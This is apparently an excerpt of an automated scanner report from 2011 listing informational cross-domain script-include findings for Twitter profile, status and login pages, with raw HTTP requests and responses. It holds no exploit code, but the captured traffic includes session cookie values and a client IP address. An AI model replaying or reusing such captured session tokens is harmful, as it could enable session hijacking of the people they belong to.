Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.440. http://twitter.com/kennychesney previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/kennychesney

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:50:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265830-80729-13721
ETag: "3e686e5003db7b91a9692a9a7630bbcc"
Last-Modified: Sat, 29 Jan 2011 01:50:30 GMT
X-Runtime: 0.00912
Content-Type: text/html; charset=utf-8
Content-Length: 47073
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.441. http://twitter.com/kfaulk33 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/kfaulk33

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409
http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:29 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265289-31703-49385
ETag: "41ff3b86a38408792b4fb731bddc8cc7"
Last-Modified: Sat, 29 Jan 2011 01:41:29 GMT
X-Runtime: 0.00715
Content-Type: text/html; charset=utf-8
Content-Length: 19131
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409" type="text/javascript"></script>
...[SNIP]...

18.442. http://twitter.com/lapubell previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/lapubell

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225026-90981-8371
ETag: "aa94e1eda1d46648c91aba85f6351309"
Last-Modified: Fri, 28 Jan 2011 14:30:26 GMT
X-Runtime: 0.00798
Content-Type: text/html; charset=utf-8
Content-Length: 38074
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.443. http://twitter.com/lapubell/status/28131682842312704 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/lapubell/status/28131682842312704

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /lapubell/status/28131682842312704 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225027-9054-47693
ETag: "f065429d1dda5b9db71fafac7ff44f41"
Last-Modified: Fri, 28 Jan 2011 14:30:27 GMT
X-Runtime: 0.05699
Content-Type: text/html; charset=utf-8
Content-Length: 13805
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjlodHRwOi8vdHdpdHRlci5jb20vbGFwdWJlbGwv%250Ac3RhdHVzLzI4MTMxNjgyODQyMzEyNzA0Ogxjc3JmX2lkIiViYzI0ZWFiYzYx%250AZjk3NTNkYjBiMDU5MDZiZWFkZTZkNDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMw%250AYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07w%250AzC0B--73b1d4476b98de5154e4e6006eaf9f2cc116e66c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.444. http://twitter.com/lapubell/status/28131682842312704 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/lapubell/status/28131682842312704

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /lapubell/status/28131682842312704 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:45 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234645-14826-4624
ETag: "64270e05655eab63cff29a5e020fda56"
Last-Modified: Fri, 28 Jan 2011 17:10:45 GMT
X-Runtime: 0.03143
Content-Type: text/html; charset=utf-8
Content-Length: 13675
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjlodHRwOi8vdHdpdHRlci5jb20vbGFwdWJlbGwv%250Ac3RhdHVzLzI4MTMxNjgyODQyMzEyNzA0OhVpbl9uZXdfdXNlcl9mbG93MDoM%250AY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMxMWM6DHR6%250AX25hbWUiFENlbnRyYWwgQW1lcmljYToPY3JlYXRlZF9hdGwrCDNO8MwtAToH%250AaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElD%250AOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNl%250AZHsA--a0d441ab5685422c52c69297972a6aff128d736b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.445. http://twitter.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/login

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224736-89084-19137
ETag: "849e44ccdc2da8651621c818bd6cc65c"
Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT
X-Runtime: 0.03302
Content-Type: text/html; charset=utf-8
Content-Length: 12714
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzhmZTI4YjQwNmVmYjgxZGY5YWI0MGFkNWYyNjIx%250AOWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--54109c50eed6759247aa1ca10510e42039e66977; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script src="http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.446. http://twitter.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/login

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225097-33250-18249
ETag: "6ce45a17fbd5e685f46135465e3d139d"
Last-Modified: Fri, 28 Jan 2011 14:31:37 GMT
X-Runtime: 0.03414
Content-Type: text/html; charset=utf-8
Content-Length: 12714
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYmUxZmI1Mzc4YmE3MTAzOGM2YmQ4YjYwMTk2YTVl%250AYjY6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--d4c47edb2bb39c8d72c4443a8903065600b0cffd; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script src="http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.447. http://twitter.com/malsup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

18.448. http://twitter.com/malsup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296173346/javascripts/api.js?1296176502
http://a0.twimg.com/a/1296173346/javascripts/lib/gears_init.js?1296176502
http://a1.twimg.com/a/1296173346/javascripts/lib/jquery.tipsy.min.js?1296176502
http://a1.twimg.com/a/1296173346/javascripts/lib/mustache.js?1296176502
http://a2.twimg.com/a/1296173346/javascripts/dismissable.js?1296176502
http://a2.twimg.com/a/1296173346/javascripts/twitter.js?1296176502
http://a3.twimg.com/a/1296173346/javascripts/geov1.js?1296176502
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:04:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296223456-14164-3404
